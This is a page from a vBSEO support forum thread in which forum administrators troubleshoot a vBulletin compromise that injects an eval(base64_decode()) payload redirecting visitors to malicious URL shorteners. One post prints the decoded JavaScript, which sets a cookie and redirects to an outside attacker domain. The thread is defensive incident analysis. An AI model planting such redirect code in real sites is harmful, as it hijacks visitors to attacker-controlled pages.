Page 3 of 21 FirstFirst 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... LastLast
Results 31 to 45 of 309
Like Tree2Likes

Security issue

This is a discussion on Security issue within the Bug Reporting forums, part of the vBSEO SEO Plugin category; Ok, here are mine: vBulletin 3.8.4 AME - The Automatic Media Embeder 2.5.6 Geek Auto-Linker 6.0.8 vBSEO 3.5.0 RC2 vBSEO ...

  1. #31
    Junior Member Array
    Real Name
    Dominik
    Join Date
    Apr 2008
    Posts
    3
    Liked
    0 times
    Ok, here are mine:

    vBulletin 3.8.4
    • AME - The Automatic Media Embeder 2.5.6
    • Geek Auto-Linker 6.0.8
    • vBSEO 3.5.0 RC2
    • vBSEO :: Sitemap Generator 2.2

  2. #32
    vBSEO Staff Array Brian Cummiskey's Avatar
    Real Name
    Brian Cummiskey
    Join Date
    Jul 2009
    Location
    btwn NYC and Boston
    Posts
    12,789
    Liked
    675 times
    Blog Entries
    2
    Off topic, but you should really upgrade to sitemap 2.5.
    Brian Cummiskey / Crawlability Inc.
    Security bulletin - Patch Level for all supported versions released

    Unveiling the NEW vBSEO Sitemap Generator 3.0. - available NOW for vBSEO Customers!


  3. #33
    Senior Member Array
    Join Date
    Oct 2005
    Posts
    109
    Liked
    2 times
    We had the same problem as well and reported some time ago.


    Out of those plugins installed above, we had AME and VBSEO and Sitemaps installed.

    We have another forum that has VBSEO and Sitemaps but no AME and it has NOT been hit.

  4. #34
    Senior Member Array
    Real Name
    Michael Biddle
    Join Date
    Jan 2007
    Location
    Southern California
    Posts
    7,095
    Liked
    5 times
    No AME here. vBSEO and vBSEO Sitemap Generator as a match though.
    The Forum Hosting - Forum Hosting from the Forum Experts

  5. #35
    Member Array
    Real Name
    Chris watson
    Join Date
    Oct 2006
    Posts
    38
    Liked
    0 times
    List of our mods-

    AMP Auto Tagger 1.0.1
    Hasann - Sub-Forum Manager 4.0.0
    ibProArcade for vBulletin 2.7.0
    Member Tracking 4.0.1
    Multiple Login Detector 1.03
    Post Replacements 1.8
    Post Thank You Hack 7.82
    Prevent Spam 1.0
    Separate Sticky and Normal Threads 4.0.1
    Spiders in WGO 1.0
    Thread Thumbnails 2.0.0
    Usergroup Color Bar 2.0.0
    vBSEO 3.5.0 RC2
    vBSEO :: Sitemap Generator 2.5
    vBulletin Blog 4.0.2
    vBulletin CMS 4.0.2
    VSa - Login To User Account 3.0.2

    Hope this helps.

  6. #36
    vBSEO Staff Array Brian Cummiskey's Avatar
    Real Name
    Brian Cummiskey
    Join Date
    Jul 2009
    Location
    btwn NYC and Boston
    Posts
    12,789
    Liked
    675 times
    Blog Entries
    2
    ^note, you should install sitemap 2.6 on vb4.
    Brian Cummiskey / Crawlability Inc.
    Security bulletin - Patch Level for all supported versions released

    Unveiling the NEW vBSEO Sitemap Generator 3.0. - available NOW for vBSEO Customers!


  7. #37
    Senior Member Array
    Join Date
    Oct 2005
    Posts
    109
    Liked
    2 times
    Ok, so we were running Sitemaps Generator 1.7. Oops. Just upgraded that to the latest one today. Will see if that helps, but kind of doubt it because I'm assuming that you are already running that one, Brian?

    On another note, we have 4 web servers running behind a load balancer - each one keeping its own set of Apache logfiles. I erased the logs completely on Saturday and then we got hit again on Sunday so it was relatively easy to scan through all of the logs to see if there was anything interesting. Nothing there. Nada. At least, nothing that caught my eye. This appears to be a SQL injection directly into my datastore table in the vB database that loads the famous eval(base64_decode()); code that redirects to the myfilestore.com site. This time there did not appear to be anything in my vbseo plugin's global_start hook, though it did appear there once in the past as well. I searched for catch phrases like eval, base64, etc. an returned nothing. Any other ideas? I'm still semi-convinced this is happening through vBSEO, somehow.

  8. #38
    vBSEO Staff Array Oleg Ignatiuk's Avatar
    Real Name
    Oleg Ignatiuk
    Join Date
    Jun 2005
    Location
    Belarus
    Posts
    25,818
    Liked
    192 times
    Hello,

    did you store a copy of datastore at the moment when the issue was happening? If yes, can you provide it in the support ticket?
    Oleg Ignatiuk / Crawlability Inc.
    Security bulletin - Patch Level for all supported versions released

    Unveiling the NEW vBSEO Sitemap Generator 3.0. - available NOW for vBSEO Customers!


  9. #39
    Senior Member Array
    Join Date
    Oct 2005
    Posts
    109
    Liked
    2 times
    No, but if/when it happens again I'll make a copy of it. All I end up doing is cycling any product inside of AdminCP which rebuilds the datastore and gets rid of it. Interesting though that the common denominator here appears to be vBSEO and the Sitemap Generator. I'm not pointing fingers by any means, but if it's a common denominator I'd say it warrants some investigation. When I originally submitted a support ticket for this issue about a month ago, I was pretty much brushed off immediately as "this isn't a vBSEO problem". Glad to see that it's starting to get some more attention now that others are reporting it as well!

  10. #40
    vBSEO Staff Array Brian Cummiskey's Avatar
    Real Name
    Brian Cummiskey
    Join Date
    Jul 2009
    Location
    btwn NYC and Boston
    Posts
    12,789
    Liked
    675 times
    Blog Entries
    2
    We are all for trying to find this if it is in fact a hole in our product, but without any log/etc data, it's a wild goose chase and no one has been able to supply such events yet.
    Brian Cummiskey / Crawlability Inc.
    Security bulletin - Patch Level for all supported versions released

    Unveiling the NEW vBSEO Sitemap Generator 3.0. - available NOW for vBSEO Customers!


  11. #41
    Senior Member Array
    Real Name
    Martyn Day
    Join Date
    Dec 2005
    Location
    Kent - UK
    Posts
    650
    Liked
    0 times
    Blog Entries
    1
    if its not a hole in vbseo it might be a hole in vb it self, so it could effect everyone, i hope you guys find it..

  12. #42
    Senior Member Array
    Join Date
    Oct 2005
    Posts
    109
    Liked
    2 times
    Just a quick update - since patching to the Sitemap Generator version 2.5, we've not seen the exploit come back...yet. Can anyone confirm that this HAS happened to them while using v2.5? Trying to narrow things down as best as I can without being able to find anything suspicious in the log files. I'd love nothing more than to say that this fixed the problem, but for now I'm keeping my fingers crossed.

  13. #43
    Junior Member Array
    Real Name
    Twelve-60
    Join Date
    Mar 2010
    Posts
    3
    Liked
    0 times
    The javascript code translates into:

    Code:
    var vbsp='96e3ad8c';
    function ipbcc(name, value) {
        var date = new Date();
        date['setTime'](date['getTime']() + 86400000);
        var expires = '; expires=' + date['toGMTString']();
        document['cookie'] = name + '=' + value + expires + '; path=/'
    };
    ipbcc('vbsp', '1');
    document['location'] = 'http://url2short.info/' + vbsp;
    However I still can't find where on the serverside it is being outputted from though >_<

    - Twelve-60

  14. #44
    Junior Member Array
    Real Name
    Andrew Hunn
    Join Date
    May 2007
    Posts
    3
    Liked
    0 times
    I just patched up a compromised installation by installing Sitemaps 2.5 and reseting the datastore. I'll keep checking it out over the next few days to make sure that it stays closed.

    Our hijack was going to URL123 - free url redirection and masking service. I noticed it was being hosted by DreamHost and sent a report to their abuse inbox. Hopefully this scumbag has a bunch of sites hosted through them that will get shut down.

    Also uploading a dump of our infected datastore for analysis. Hope it's helpful.

  15. #45
    Junior Member Array
    Real Name
    Twelve-60
    Join Date
    Mar 2010
    Posts
    3
    Liked
    0 times
    After being unsuccessful in finding the source of the outputted JavaScript, I reimported crawlability_vbseo.xml and it seemed to fix it!

    - Twelve-60

Page 3 of 21 FirstFirst 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... LastLast

Similar Threads

  1. Security issue with filevbseo_getsitemap.php
    By mihai11 in forum Bug Reporting
    Replies: 3
    Last Post: 11-05-2008, 02:34 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •